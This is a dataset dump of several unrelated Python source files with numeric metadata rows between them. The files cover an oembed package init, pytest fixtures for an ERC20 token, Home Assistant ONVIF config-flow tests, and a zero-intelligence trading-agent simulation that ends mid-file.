| 75
| 5.8
| 0.5
| 0.275862
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093333
| 75
| 5
| 21
| 15
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 6
|
8661c5052bfef444aee5ba496e134425f6dd1677
| 143
|
py
|
Python
|
oembed/image_processors/__init__.py
|
EightMedia/djangoembed
|
ee325f7375c48405f9c3e7e2c0fa7f5a08fafd48
|
[
"MIT"
] | 8
|
2015-02-06T19:18:49.000Z
|
2021-01-01T05:46:02.000Z
|
oembed/image_processors/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | null | null | null |
oembed/image_processors/__init__.py
|
ericholscher/djangoembed
|
8d6c3edcde782285076445577c4a2ad1c96a0350
|
[
"MIT"
] | 5
|
2015-03-15T11:41:26.000Z
|
2018-03-08T09:45:26.000Z
|
from oembed.constants import OEMBED_IMAGE_PROCESSOR
from oembed.utils import load_class

# Resolve the configured image-processor dotted path into the concrete
# class object used throughout the oembed package.
image_processor = load_class(OEMBED_IMAGE_PROCESSOR)
| 23.833333
| 52
| 0.874126
| 20
| 143
| 5.9
| 0.45
| 0.355932
| 0.338983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 143
| 5
| 53
| 28.6
| 0.907692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8681a52bd070b65ed1fa8dafc44cd06a3c8b061f
| 73
|
py
|
Python
|
config/__init__.py
|
Neuralearn/PAN.pytorch
|
111a85f6d186d9043f82416e14644ebf19975b58
|
[
"Apache-2.0"
] | 419
|
2019-08-24T02:56:28.000Z
|
2022-03-27T17:46:26.000Z
|
config/__init__.py
|
Neuralearn/PAN.pytorch
|
111a85f6d186d9043f82416e14644ebf19975b58
|
[
"Apache-2.0"
] | 43
|
2019-08-25T15:46:14.000Z
|
2021-09-29T14:11:21.000Z
|
config/__init__.py
|
Neuralearn/PAN.pytorch
|
111a85f6d186d9043f82416e14644ebf19975b58
|
[
"Apache-2.0"
] | 126
|
2019-08-24T16:52:34.000Z
|
2021-09-20T21:44:40.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:50
# @Author : zhoujun
| 24.333333
| 28
| 0.520548
| 11
| 73
| 3.454545
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.214286
| 0.232877
| 73
| 3
| 29
| 24.333333
| 0.464286
| 0.917808
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
86a3d6625dfdfac0591f77bcbcdbf29113ac1e3e
| 46
|
py
|
Python
|
django_morepath/__init__.py
|
morepath/django-morepath
|
8f575684a032af1d1cfa97ba3e9e132096572e7e
|
[
"BSD-3-Clause"
] | 2
|
2020-01-16T16:00:59.000Z
|
2020-01-19T18:24:08.000Z
|
django_morepath/__init__.py
|
morepath/django-morepath
|
8f575684a032af1d1cfa97ba3e9e132096572e7e
|
[
"BSD-3-Clause"
] | null | null | null |
django_morepath/__init__.py
|
morepath/django-morepath
|
8f575684a032af1d1cfa97ba3e9e132096572e7e
|
[
"BSD-3-Clause"
] | null | null | null |
from .views import make_morepath_view # noqa
| 23
| 45
| 0.804348
| 7
| 46
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.152174
| 46
| 1
| 46
| 46
| 0.897436
| 0.086957
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
86c8b4e8e241ec091fca1e868b1636554866b891
| 160
|
py
|
Python
|
tests/conftest.py
|
unparalleled-js/ape-demo-erc20
|
d2bfb04497d64cef3096f92784ffeda2f4deb490
|
[
"MIT"
] | 1
|
2022-03-09T14:29:30.000Z
|
2022-03-09T14:29:30.000Z
|
tests/conftest.py
|
unparalleled-js/ape-demo-erc20
|
d2bfb04497d64cef3096f92784ffeda2f4deb490
|
[
"MIT"
] | null | null | null |
tests/conftest.py
|
unparalleled-js/ape-demo-erc20
|
d2bfb04497d64cef3096f92784ffeda2f4deb490
|
[
"MIT"
] | null | null | null |
import pytest
@pytest.fixture
def owner(accounts):
    """Return the first configured test account, used as the contract deployer."""
    return accounts[0]
@pytest.fixture
def token(owner, project):
    """Deploy the project's Token contract from the owner account and return it."""
    return owner.deploy(project.Token)
| 13.333333
| 38
| 0.7375
| 21
| 160
| 5.619048
| 0.52381
| 0.220339
| 0.271186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007407
| 0.15625
| 160
| 11
| 39
| 14.545455
| 0.866667
| 0
| 0
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0.142857
| 0.285714
| 0.714286
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
d4a90ce81c6e8b67f84b1307b33ebc009055d1b3
| 19,143
|
py
|
Python
|
tests/components/onvif/test_config_flow.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 3
|
2020-11-27T06:26:27.000Z
|
2020-12-09T14:55:16.000Z
|
tests/components/onvif/test_config_flow.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 25
|
2021-10-02T10:01:14.000Z
|
2022-03-31T06:11:49.000Z
|
tests/components/onvif/test_config_flow.py
|
MrDelik/core
|
93a66cc357b226389967668441000498a10453bb
|
[
"Apache-2.0"
] | 3
|
2022-01-02T18:49:54.000Z
|
2022-01-25T02:03:54.000Z
|
"""Test ONVIF config flow."""
from unittest.mock import MagicMock, patch
from onvif.exceptions import ONVIFError
from zeep.exceptions import Fault
from homeassistant import config_entries, data_entry_flow
from homeassistant.components.onvif import config_flow
from . import (
HOST,
MAC,
NAME,
PASSWORD,
PORT,
SERIAL_NUMBER,
URN,
USERNAME,
setup_mock_device,
setup_mock_onvif_camera,
setup_onvif_integration,
)
# Two fake WS-Discovery results: the "known" camera built from the shared
# test constants, plus a second, distinct camera for multi-device scenarios.
DISCOVERY = [
    {
        "EPR": URN,
        config_flow.CONF_NAME: NAME,
        config_flow.CONF_HOST: HOST,
        config_flow.CONF_PORT: PORT,
        "MAC": MAC,
    },
    {
        "EPR": "urn:uuid:987654321",
        config_flow.CONF_NAME: "TestCamera2",
        config_flow.CONF_HOST: "5.6.7.8",
        config_flow.CONF_PORT: PORT,
        "MAC": "ee:dd:cc:bb:aa",
    },
]
def setup_mock_discovery(
    mock_discovery, with_name=False, with_mac=False, two_devices=False
):
    """Prepare mock discovery result.

    Builds one mock WS-Discovery service per DISCOVERY entry; optionally
    attaches ONVIF name and/or MAC scopes so the config flow can extract
    them.

    NOTE(review): ``two_devices`` is accepted but never used here — both
    DISCOVERY entries are always returned; confirm whether it is vestigial.
    """
    services = []
    for item in DISCOVERY:
        service = MagicMock()
        # XAddr the flow parses for host/port.
        service.getXAddrs = MagicMock(
            return_value=[
                f"http://{item[config_flow.CONF_HOST]}:{item[config_flow.CONF_PORT]}/onvif/device_service"
            ]
        )
        service.getEPR = MagicMock(return_value=item["EPR"])
        scopes = []
        if with_name:
            scope = MagicMock()
            scope.getValue = MagicMock(
                return_value=f"onvif://www.onvif.org/name/{item[config_flow.CONF_NAME]}"
            )
            scopes.append(scope)
        if with_mac:
            scope = MagicMock()
            scope.getValue = MagicMock(
                return_value=f"onvif://www.onvif.org/mac/{item['MAC']}"
            )
            scopes.append(scope)
        service.getScopes = MagicMock(return_value=scopes)
        services.append(service)
    mock_discovery.return_value = services
async def test_flow_discovered_devices(hass):
    """Test that config flow works for discovered devices.

    Walks the full user flow: auto-discovery, device selection by URN,
    then credentials, and checks the created entry's data.
    """
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.config_flow.wsdiscovery"
    ) as mock_discovery, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device:
        setup_mock_onvif_camera(mock_onvif_camera)
        setup_mock_discovery(mock_discovery)
        setup_mock_device(mock_device)
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={"auto": True}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "device"
        # Two discovered devices + the manual-entry option.
        assert len(result["data_schema"].schema[config_flow.CONF_HOST].container) == 3
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={config_flow.CONF_HOST: f"{URN} ({HOST})"}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "configure"
        with patch(
            "homeassistant.components.onvif.async_setup", return_value=True
        ) as mock_setup, patch(
            "homeassistant.components.onvif.async_setup_entry", return_value=True
        ) as mock_setup_entry:
            result = await hass.config_entries.flow.async_configure(
                result["flow_id"],
                user_input={
                    config_flow.CONF_USERNAME: USERNAME,
                    config_flow.CONF_PASSWORD: PASSWORD,
                },
            )
            await hass.async_block_till_done()
            assert len(mock_setup.mock_calls) == 1
            assert len(mock_setup_entry.mock_calls) == 1
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert result["title"] == f"{URN} - {MAC}"
        assert result["data"] == {
            config_flow.CONF_NAME: URN,
            config_flow.CONF_HOST: HOST,
            config_flow.CONF_PORT: PORT,
            config_flow.CONF_USERNAME: USERNAME,
            config_flow.CONF_PASSWORD: PASSWORD,
        }
async def test_flow_discovered_devices_ignore_configured_manual_input(hass):
    """Test that config flow discovery ignores configured devices.

    With one device already set up, only the remaining discovered device
    plus the manual-entry option should be offered.
    """
    await setup_onvif_integration(hass)
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.config_flow.wsdiscovery"
    ) as mock_discovery, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device:
        setup_mock_onvif_camera(mock_onvif_camera)
        # MAC scopes let the flow match the already-configured device.
        setup_mock_discovery(mock_discovery, with_mac=True)
        setup_mock_device(mock_device)
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={"auto": True}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "device"
        # One unconfigured device + the manual-entry option.
        assert len(result["data_schema"].schema[config_flow.CONF_HOST].container) == 2
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"],
            user_input={config_flow.CONF_HOST: config_flow.CONF_MANUAL_INPUT},
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "configure"
async def test_flow_discovered_no_device(hass):
    """Test that config flow discovery no device.

    When discovery returns nothing, the flow should skip the device-pick
    step and go straight to manual configuration.
    """
    await setup_onvif_integration(hass)
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.config_flow.wsdiscovery"
    ) as mock_discovery, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device:
        setup_mock_onvif_camera(mock_onvif_camera)
        # Empty discovery result.
        mock_discovery.return_value = []
        setup_mock_device(mock_device)
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={"auto": True}
        )
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "configure"
async def test_flow_discovery_ignore_existing_and_abort(hass):
    """Test that config flow discovery ignores setup devices.

    Both discovered devices are pre-configured, so discovery should fall
    through to manual entry, and manually re-entering a configured device
    should abort.
    """
    await setup_onvif_integration(hass)
    # Configure the second discovered device as well.
    await setup_onvif_integration(
        hass,
        config={
            config_flow.CONF_NAME: DISCOVERY[1]["EPR"],
            config_flow.CONF_HOST: DISCOVERY[1][config_flow.CONF_HOST],
            config_flow.CONF_PORT: DISCOVERY[1][config_flow.CONF_PORT],
            config_flow.CONF_USERNAME: "",
            config_flow.CONF_PASSWORD: "",
        },
        unique_id=DISCOVERY[1]["MAC"],
        entry_id="2",
    )
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.config_flow.wsdiscovery"
    ) as mock_discovery, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device:
        setup_mock_onvif_camera(mock_onvif_camera)
        setup_mock_discovery(mock_discovery, with_name=True, with_mac=True)
        setup_mock_device(mock_device)
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"], user_input={"auto": True}
        )
        # It should skip to manual entry if the only devices are already configured
        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "configure"
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"],
            user_input={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )
        # It should abort if already configured and entered manually
        assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
async def test_flow_manual_entry(hass):
    """Test that config flow works for manually entered devices.

    (Docstring previously said "discovered devices" — this path declines
    auto-discovery and fills in the configure form by hand.)
    """
    result = await hass.config_entries.flow.async_init(
        config_flow.DOMAIN, context={"source": config_entries.SOURCE_USER}
    )

    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "user"

    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.config_flow.wsdiscovery"
    ) as mock_discovery, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device:
        setup_mock_onvif_camera(mock_onvif_camera, two_profiles=True)
        # no discovery
        mock_discovery.return_value = []
        setup_mock_device(mock_device)

        # Declining auto-discovery sends the flow straight to manual configure.
        result = await hass.config_entries.flow.async_configure(
            result["flow_id"],
            user_input={"auto": False},
        )

        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "configure"

        with patch(
            "homeassistant.components.onvif.async_setup", return_value=True
        ) as mock_setup, patch(
            "homeassistant.components.onvif.async_setup_entry", return_value=True
        ) as mock_setup_entry:
            result = await hass.config_entries.flow.async_configure(
                result["flow_id"],
                user_input={
                    config_flow.CONF_NAME: NAME,
                    config_flow.CONF_HOST: HOST,
                    config_flow.CONF_PORT: PORT,
                    config_flow.CONF_USERNAME: USERNAME,
                    config_flow.CONF_PASSWORD: PASSWORD,
                },
            )
            await hass.async_block_till_done()

            assert len(mock_setup.mock_calls) == 1
            assert len(mock_setup_entry.mock_calls) == 1

            assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
            assert result["title"] == f"{NAME} - {MAC}"
            assert result["data"] == {
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            }
async def test_flow_import_not_implemented(hass):
    """Test that import falls back to the Serial Number when the device
    does not implement the network-interfaces call (no MAC available)."""
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device, patch(
        "homeassistant.components.onvif.async_setup", return_value=True
    ) as mock_setup, patch(
        "homeassistant.components.onvif.async_setup_entry", return_value=True
    ) as mock_setup_entry:
        setup_mock_onvif_camera(mock_onvif_camera, with_interfaces_not_implemented=True)
        setup_mock_device(mock_device)

        result = await hass.config_entries.flow.async_init(
            config_flow.DOMAIN,
            context={"source": config_entries.SOURCE_IMPORT},
            data={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )
        await hass.async_block_till_done()

        assert len(mock_setup.mock_calls) == 1
        assert len(mock_setup_entry.mock_calls) == 1

        # The serial number replaces the MAC in the entry title.
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert result["title"] == f"{NAME} - {SERIAL_NUMBER}"
        assert result["data"] == {
            config_flow.CONF_NAME: NAME,
            config_flow.CONF_HOST: HOST,
            config_flow.CONF_PORT: PORT,
            config_flow.CONF_USERNAME: USERNAME,
            config_flow.CONF_PASSWORD: PASSWORD,
        }
async def test_flow_import_no_mac(hass):
    """Test that config flow uses Serial Number when no MAC available."""
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera, patch(
        "homeassistant.components.onvif.ONVIFDevice"
    ) as mock_device, patch(
        "homeassistant.components.onvif.async_setup", return_value=True
    ) as mock_setup, patch(
        "homeassistant.components.onvif.async_setup_entry", return_value=True
    ) as mock_setup_entry:
        # Camera without network interfaces -> no MAC address available.
        setup_mock_onvif_camera(mock_onvif_camera, with_interfaces=False)
        setup_mock_device(mock_device)

        result = await hass.config_entries.flow.async_init(
            config_flow.DOMAIN,
            context={"source": config_entries.SOURCE_IMPORT},
            data={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )
        await hass.async_block_till_done()

        assert len(mock_setup.mock_calls) == 1
        assert len(mock_setup_entry.mock_calls) == 1

        # The serial number replaces the MAC in the entry title.
        assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
        assert result["title"] == f"{NAME} - {SERIAL_NUMBER}"
        assert result["data"] == {
            config_flow.CONF_NAME: NAME,
            config_flow.CONF_HOST: HOST,
            config_flow.CONF_PORT: PORT,
            config_flow.CONF_USERNAME: USERNAME,
            config_flow.CONF_PASSWORD: PASSWORD,
        }
async def test_flow_import_no_mac_or_serial(hass):
    """Test that config flow fails when no MAC or Serial Number available."""
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera:
        setup_mock_onvif_camera(
            mock_onvif_camera, with_interfaces=False, with_serial=False
        )

        result = await hass.config_entries.flow.async_init(
            config_flow.DOMAIN,
            context={"source": config_entries.SOURCE_IMPORT},
            data={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )

        # Without any unique identifier the entry cannot be created.
        assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
        assert result["reason"] == "no_mac"
async def test_flow_import_no_h264(hass):
    """Test that config flow aborts when no H264 stream profile is available.

    (Docstring previously said "no MAC available" — copy-paste error.)
    """
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera:
        setup_mock_onvif_camera(mock_onvif_camera, with_h264=False)

        result = await hass.config_entries.flow.async_init(
            config_flow.DOMAIN,
            context={"source": config_entries.SOURCE_IMPORT},
            data={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )

        assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
        assert result["reason"] == "no_h264"
async def test_flow_import_onvif_api_error(hass):
    """Test that config flow aborts when the ONVIF API fails."""
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera:
        setup_mock_onvif_camera(mock_onvif_camera)
        # Simulate the device-management service failing with an ONVIF error.
        mock_onvif_camera.create_devicemgmt_service = MagicMock(
            side_effect=ONVIFError("Could not get device mgmt service")
        )

        result = await hass.config_entries.flow.async_init(
            config_flow.DOMAIN,
            context={"source": config_entries.SOURCE_IMPORT},
            data={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )

        assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
        assert result["reason"] == "onvif_error"
async def test_flow_import_onvif_auth_error(hass):
    """Test that an ONVIF auth failure re-shows the configure form.

    (Docstring previously said the flow "fails"; the asserts below show it
    returns the configure form with a ``cannot_connect`` error instead.)
    """
    with patch(
        "homeassistant.components.onvif.config_flow.get_device"
    ) as mock_onvif_camera:
        setup_mock_onvif_camera(mock_onvif_camera)
        # A Fault during devicemgmt creation is surfaced as cannot_connect.
        mock_onvif_camera.create_devicemgmt_service = MagicMock(
            side_effect=Fault("Auth Error")
        )

        result = await hass.config_entries.flow.async_init(
            config_flow.DOMAIN,
            context={"source": config_entries.SOURCE_IMPORT},
            data={
                config_flow.CONF_NAME: NAME,
                config_flow.CONF_HOST: HOST,
                config_flow.CONF_PORT: PORT,
                config_flow.CONF_USERNAME: USERNAME,
                config_flow.CONF_PASSWORD: PASSWORD,
            },
        )

        assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
        assert result["step_id"] == "configure"
        assert result["errors"]["base"] == "cannot_connect"
async def test_option_flow(hass):
    """Test config flow options (extra FFmpeg arguments and RTSP transport)."""
    entry, _, _ = await setup_onvif_integration(hass)

    result = await hass.config_entries.options.async_init(entry.entry_id)
    assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
    assert result["step_id"] == "onvif_devices"

    result = await hass.config_entries.options.async_configure(
        result["flow_id"],
        user_input={
            config_flow.CONF_EXTRA_ARGUMENTS: "",
            config_flow.CONF_RTSP_TRANSPORT: config_flow.RTSP_TRANS_PROTOCOLS[1],
        },
    )

    # Submitted options come back verbatim as the created options data.
    assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
    assert result["data"] == {
        config_flow.CONF_EXTRA_ARGUMENTS: "",
        config_flow.CONF_RTSP_TRANSPORT: config_flow.RTSP_TRANS_PROTOCOLS[1],
    }
| 36.255682
| 106
| 0.64457
| 2,231
| 19,143
| 5.200359
| 0.071268
| 0.11205
| 0.104982
| 0.088174
| 0.874591
| 0.86373
| 0.840286
| 0.822013
| 0.818393
| 0.809171
| 0
| 0.002821
| 0.259207
| 19,143
| 527
| 107
| 36.324478
| 0.815316
| 0.0105
| 0
| 0.664319
| 0
| 0
| 0.135626
| 0.087858
| 0
| 0
| 0
| 0
| 0.140845
| 1
| 0.002347
| false
| 0.035211
| 0.042254
| 0
| 0.044601
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d4bbe95ba1a91c39688ec390f96da9b1cf149480
| 7,725
|
py
|
Python
|
agent.py
|
ringochuchudull/abm-fms-intel
|
9a7541b7ae8c826bb8a4660e87ed7085edeab61f
|
[
"Apache-2.0"
] | null | null | null |
agent.py
|
ringochuchudull/abm-fms-intel
|
9a7541b7ae8c826bb8a4660e87ed7085edeab61f
|
[
"Apache-2.0"
] | null | null | null |
agent.py
|
ringochuchudull/abm-fms-intel
|
9a7541b7ae8c826bb8a4660e87ed7085edeab61f
|
[
"Apache-2.0"
] | null | null | null |
from utility import *
import random
import numpy as np #np.exp
# Super Class
class Agent:
    """Abstract market agent that tracks holdings and transaction history.

    record(): change the amount of shares held and log the transaction price.
    newact(): simulate a trading decision (implemented by subclasses).
    profit(): realized cash flow so far.
    """

    def __init__(self, id):
        self.id = id
        # Share count also determines whether the agent acts as buyer or seller.
        self.share = 0
        self.sell_record = []  # prices received when selling
        self.buy_record = []   # prices paid when buying

    def __str__(self):
        return '<Agent ' + str(self.id) + ' > '

    def record(self, direction, trans_price, market=None, quantity=1):
        """Adjust holdings by *quantity* and log *trans_price*.

        A truthy *direction* means a sell; falsy means a buy.
        """
        if direction:  # If Sell
            self.share -= quantity
            self.sell_record.append(trans_price)
        else:
            self.share += quantity
            self.buy_record.append(trans_price)

    def newact(self):
        """Return (dealer, transaction_price, direction); subclass responsibility.

        Raises NotImplementedError (was a bare ``Exception``) so the abstract
        contract is recognizable to callers and tooling.
        """
        raise NotImplementedError('No implementation')

    def profit(self):
        """Realized profit: total sale proceeds minus total purchase cost."""
        return sum(self.sell_record) - sum(self.buy_record)
# Sub Class
class ZeroIntelligentAgent(Agent):
    """Agent that quotes randomly re-drawn prices and trades with the best counterparty."""

    def __init__(self, id, sellprice=maxP, bidprice=1):
        Agent.__init__(self,id)
        self.sellprice = sellprice  # ask price, defaults to maxP (from utility)
        self.bidprice = bidprice    # bid price

    def __str__(self):
        return '<0IQAgent %d owns %d share with sell price %f and bidprice %f>' % (self.id, self.share, self.sellprice, self.bidprice)

    def resetPrice(self,price):
        # Re-randomize both quotes around the last transaction price.
        self.bidprice = random.randint(1,price)
        self.sellprice = random.randint(price, maxP)

    def sell(self, market=None):
        """Pick the highest-bidding non-holder; return (buyer, price) or (None, None)."""
        # Randomly drift the ask down (updateSellorBidPrice comes from utility).
        if updateSellorBidPrice():
            self.sellprice -= 1
        if not market.num_buyer:
            #market.record_order(market.stockprice)
            return None, None
        else:
            index = -1
            maxBuy = 1
            for i,s in enumerate(market.agentlist):
                if s.bidprice > maxBuy and not s.share:
                    index, maxBuy = i, s.bidprice
            # NOTE(review): if no buyer matches, index stays -1 and this returns
            # the LAST agent in the list at price 1 — confirm this is intended.
            curr_buyer_agent = market.agentlist[index]
            tranction_price = maxBuy
            return curr_buyer_agent, tranction_price

    def buy(self, market=None):
        """Pick the lowest-asking holder, or buy at the market price."""
        # a) Update the price
        if updateSellorBidPrice():
            self.bidprice += 1
        if not market.num_seller:
            print('haha')
            return None, market.stockprice
        else:
            index = -1
            minSell = maxP
            for i,s in enumerate(market.agentlist):
                if s.sellprice < minSell and s.share:
                    index, minSell = i, s.sellprice
            print('Agent ' + str(index+1) + ' offers to sell the lowest price £' + str(minSell))
            # Buy at market
            if market.stockprice < minSell and market.shares > 0:
                return None, market.stockprice
            else:
                # Buy from Sellers
                curr_seller_agent = market.agentlist[index]
                tranction_price = minSell
                return curr_seller_agent, tranction_price

    def record(self, direction, price, market=None, quantity=1, reset=True):
        """Record the transaction; when *reset*, re-randomize quotes around *price*."""
        if direction: #If Sell
            self.share -= quantity
            self.sell_record.append(price)
        else:
            self.share += quantity
            self.buy_record.append(price)
        if reset:
            print('reset price')
            self.resetPrice(int(price))

    def newact(self, market):
        """Decide a trade: holders sell, non-holders buy.

        Returns (counterparty_or_None, transaction_price, direction).
        """
        # If the agent has one share, the agent is a seller
        if self.share:
            direction = SELL
            current_buyer, transaction_price = self.sell(market=market)
            return current_buyer, transaction_price, direction
        else:
            direction = BUY
            current_seller, transaction_price = self.buy(market=market)
            return current_seller, transaction_price, direction
# Sub Class
class ImitatingAgent(Agent):
